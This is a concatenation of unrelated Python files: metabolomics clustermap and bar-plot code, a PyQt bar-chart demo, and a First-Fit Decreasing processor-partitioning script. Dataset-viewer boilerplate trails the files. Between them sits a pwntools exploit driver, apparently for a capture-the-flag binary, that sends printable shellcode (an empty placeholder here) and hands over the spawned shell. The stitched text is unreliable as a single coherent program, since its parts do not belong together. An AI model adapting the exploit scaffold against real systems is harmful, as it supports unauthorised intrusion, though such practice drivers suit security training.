    hue=None,
    palette=PALETTE,
    save_path=None,
    font_scale=1,
    ax=None,
):
    """Draw a bar plot of per-molecule statistics, colored by significance.

    Parameters
    ----------
    x, y : array-like
        Bar lengths and bar labels (callers pass the statistic as *x* and the
        molecule names as *y* for horizontal bars).
    title : str
        Plot title.
    figsize : tuple
        Size of the figure created when no *ax* is supplied.
    hue : array-like, optional
        Per-bar grouping (significance labels) mapped through *palette*.
    palette : dict
        hue-value -> color mapping.
    save_path : str, optional
        If given, the current figure is saved to this path.
    font_scale : float
        Passed to seaborn's font scaling.
    ax : matplotlib Axes, optional
        Target axes; when given, the bars are drawn there.

    NOTE: a new figure is always created even when *ax* is supplied — the
    stray figure deliberately absorbs the plt.legend()/plt.title() calls
    below so they do not land on the caller's figure (create_plot re-applies
    title/legend on its own axes afterwards).
    """
    plt.figure(figsize=figsize)
    sns.set(font_scale=font_scale)
    # Honor the caller-supplied palette (this parameter used to be ignored
    # in favor of the module-level PALETTE).
    sns.barplot(y=y, x=x, hue=hue, palette=palette, dodge=False, ax=ax)
    plt.legend(loc="upper right")
    plt.title(title)
    # Honor save_path, which used to be accepted but never used.
    if save_path is not None:
        plt.savefig(save_path)
def create_plot(
    cluster_data,
    barplot_data,
    super_title,
    heatmap_title,
    barplot_title,
    gridspec_dict,
    fig_size,
    save_path,
    combo_plot=False,
    font_scale=1,
):
    """Render a seaborn clustermap, optionally paired with a bar plot.

    When combo_plot is True, the clustermap is squeezed into the right-hand
    portion of the figure (per gridspec_dict) and a horizontal bar plot of
    the Wilcoxon statistics from barplot_data is added on the left.
    The figure is saved to save_path and the bare file name is returned.

    barplot_data / barplot_title / gridspec_dict are only used when
    combo_plot is True and may be None otherwise.
    """
    sns.set(font_scale=font_scale)
    plot = sns.clustermap(cluster_data, figsize=fig_size)
    if super_title:
        plot.fig.suptitle(super_title)
    plot.ax_heatmap.set_title(heatmap_title, pad=45)
    # Rotate x tick labels so long molecule names remain readable.
    plot.ax_heatmap.xaxis.set_ticklabels(
        ticklabels=plot.ax_heatmap.xaxis.get_ticklabels(), rotation=90
    )
    if combo_plot:
        # Shrink the clustermap into the right portion of the figure...
        plot.gs.update(
            left=gridspec_dict["clustermap_left"],
            right=gridspec_dict["clustermap_right"],
        )
        # ...and carve out a separate 1x1 gridspec on the left for the bars.
        gs2 = matplotlib.gridspec.GridSpec(
            1,
            1,
            left=gridspec_dict["barplot_left"],
            right=gridspec_dict["barplot_right"],
        )
        ax2 = plot.fig.add_subplot(gs2[0])
        x = barplot_data["Molecule"].values
        y = barplot_data[WILCOXON_STAT].values
        hue = barplot_data["Significance"].values
        # NOTE: arguments are intentionally passed as (y, x) so the bars are
        # horizontal: statistic on the x axis, molecule names on the y axis.
        create_bar_plots(
            y, x, hue=hue, title=barplot_title, font_scale=font_scale, ax=ax2
        )
        ax2.set_title(barplot_title)
        ax2.set_xlabel(WILCOXON_STAT)
        ax2.set_ylabel("Molecule")
        ax2.legend(title="Significance")
    plot.savefig(save_path, dpi=300)
    # Return just the file name; save_path is expected to contain a "/".
    return save_path.rsplit("/", 1)[1]
def graphics(locations):
    """Build every output figure for one run.

    Produces the all-sample clustermap plus one combined clustermap /
    bar-plot figure per measure, each written to /tmp.

    Returns the list of created file names (basenames only).
    """
    plot_data = process_data(locations)
    created_files = []

    # Clustermap over every sample, with no accompanying bar plot.
    created_files.append(
        create_plot(
            plot_data.get("heatmap_all_samples"),
            None,
            super_title=None,
            heatmap_title="Clustermap - All Samples",
            barplot_title=None,
            gridspec_dict=None,
            fig_size=BARPLOT_FIG_SIZE,
            save_path="/tmp/heatmap_all.png",
        )
    )

    # Shared layout for the combined figures: bar plot on the left,
    # clustermap on the right.
    layout = {
        "barplot_left": 0.0,
        "barplot_right": 0.45,
        "clustermap_left": 0.50,
        "clustermap_right": 1.0,
    }

    # One combined figure per measure, measure2 first (matches the original
    # output order).
    combo_specs = [
        (
            "measure2",
            plot_data.get("heatmap_measure2_significant"),
            plot_data.get("summ_stats_measure2"),
        ),
        (
            "measure1",
            plot_data.get("heatmap_measure1_significant"),
            plot_data.get("summ_stats_measure1"),
        ),
    ]
    for measure, heatmap_df, stats_df in combo_specs:
        created_files.append(
            create_plot(
                heatmap_df,
                stats_df,
                super_title="Nominally Significant Metabolites and {} Clustermap".format(
                    measure
                ),
                heatmap_title="Clustermap - {} Samples".format(measure),
                barplot_title="Nominally Significant Metabolites (p < 0.1) - {}".format(
                    measure
                ),
                gridspec_dict=layout,
                fig_size=COMBO_FIG_SIZE,
                save_path="/tmp/{}_heatmap_stat_sig_metabolites.png".format(measure),
                combo_plot=True,
            )
        )

    return created_files
|
# Exploit driver for ./filters_isprint — presumably the target filters input
# through isprint(), so the payload must be printable ASCII; verify against
# the binary.
from pwn import *

# Target is a 64-bit binary; tell pwntools so asm()/shellcraft emit amd64.
context.arch = 'amd64'

p = process("./filters_isprint")

# TODO: placeholder — the actual (printable) shellcode bytes go here.
shellcode = b""
print(shellcode)
p.send(shellcode)
# Hand the terminal over to the (hopefully spawned) shell.
p.interactive()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from qtplotlib.barplot import QBarPlot
from PyQt5.QtWidgets import QApplication
if __name__ == '__main__':
    app = QApplication(sys.argv)

    # Demo bar plot: one missing value (None) and per-bar colors; bars whose
    # color is None fall back to the widget's default.
    widget = QBarPlot()
    widget.data = (8, None, 7, 5, -5, 6)
    widget.data_color = ("green", None, "yellow", None, "red", "yellow")
    widget.title = "Hello"
    widget.hlines = (1, -2, 10)
    widget.ymin = -2
    widget.show()

    # Enter the Qt event loop; exec_() carries a trailing underscore because
    # "exec" was a reserved word in Python 2.
    exit_code = app.exec_()

    # Exit with Qt's status code so the environment sees how the app ended.
    sys.exit(exit_code)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import subprocess
import re
class Task(object):
    """A schedulable task: an identifier, a utilization, and an assigned processor.

    Replaces the previous class-attribute-only record with a proper
    constructor; ``Task()`` with no arguments still yields the same defaults.
    """

    def __init__(self, tasknum=0, utilization=0, processor=0):
        self.tasknum = tasknum          # task identifier (index in input order)
        self.utilization = utilization  # CPU utilization, expected in [0, 1]
        self.processor = processor      # processor/bin assigned by partitioning
def make_task(tasknum, utilization):
    """Build a Task with the given id and utilization, initially on processor 0."""
    new_task = Task()
    new_task.tasknum = tasknum
    new_task.utilization = utilization
    new_task.processor = 0
    return new_task
def parition_ffd(procs, utilizations):
    """Partition tasks onto *procs* processors with First-Fit Decreasing.

    Tasks are sorted by decreasing utilization and each is placed on the
    first processor whose total utilization stays <= 1.  Prints the final
    per-processor loads followed by the assignment of tasks to processors.

    (Name kept as-is — "parition" — for caller compatibility.)
    """
    bins = [0] * procs  # current total utilization of each processor

    taskset = [make_task(i, u) for i, u in enumerate(utilizations)]
    taskset.sort(key=lambda t: t.utilization, reverse=True)

    for task in taskset:
        for i, load in enumerate(bins):
            if load + task.utilization <= 1:
                bins[i] += task.utilization
                task.processor = i
                break
        else:
            # No processor can take this task.  The previous version left it
            # silently assigned to processor 0; keep that assignment but make
            # the failed placement visible.
            print("Warning: task J{} (utilization {}) does not fit on any "
                  "processor; leaving it on processor 0".format(
                      task.tasknum, task.utilization))

    print(bins)

    # Report assignments in original task order.
    taskset.sort(key=lambda t: t.tasknum)
    for i in range(procs):
        print("Processor " + str(i) + ":", end=" ")
        for task in taskset:
            if task.processor == i:
                print(" J" + str(task.tasknum), end=" ")
        print()
def main(args):
    """Validate the requested task set, then run the FFD partitioner."""
    print('Partitioning {} tasks on {} processors.'.format(len(args.utilizations), args.procs))
    # A single task with utilization > 1 can never be scheduled; bail early.
    if any(utilization > 1 for utilization in args.utilizations):
        print('Error: Cannot have a task with utilization greater than 1!')
        return
    parition_ffd(args.procs, args.utilizations)
if __name__ == "__main__":
    # Fixed the user-facing description: "partion" -> "partition", and the
    # implicitly concatenated string literals lacked a separating " of ",
    # previously rendering as "...given a settasks...".
    PARSER = argparse.ArgumentParser(
        description='Generates a process partition scheme given a set of '
                    'tasks and number of processors')
    PARSER.add_argument('--procs', dest='procs', action='store',
                        default=4, type=int, help='Number of processors')
    PARSER.add_argument('utilizations', metavar='N', type=float, nargs='+',
                        help='A task utilization')
    ARGS = PARSER.parse_args()
    main(ARGS)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.